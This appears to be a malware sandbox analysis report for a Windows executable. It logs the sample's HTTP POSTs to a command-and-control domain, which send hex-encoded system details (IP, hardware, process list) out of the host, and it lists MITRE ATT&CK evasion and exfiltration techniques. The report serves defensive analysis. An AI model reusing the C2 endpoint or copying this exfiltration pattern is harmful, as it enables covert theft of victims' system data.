Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: /Content-Type: application/jsonContent-Length: 559528Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 37 35 38 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global traffic	HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: /Content-Type: application/jsonContent-Length: 559528Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 37 35 38 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global traffic	HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: /Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.twentytk20ht.top

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
Tactics:	Lateral Movement
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report u57m8aCdwb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
u57m8aCdwb.exe

Function 0050255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282
fileCOMMON

Function 005029FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321
registryfileCOMMON

Function 005105B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377
networkCOMMON

Function 00516FA0 Relevance: 6.3, APIs: 4, Instructions: 261
COMMON

Function 005CB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
COMMON

Function 005C9740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743
registryCOMMON

Function 00538B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269
networkCOMMON

Function 00502F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144
registryCOMMON

Function 005076A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73
networkCOMMON

Function 00539290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
networkCOMMON

Function 00507770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
networkCOMMON

Function 005075E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
networkCOMMON

Function 00888E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125
COMMON

Function 0053A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
COMMON

Function 0051D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
networkCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre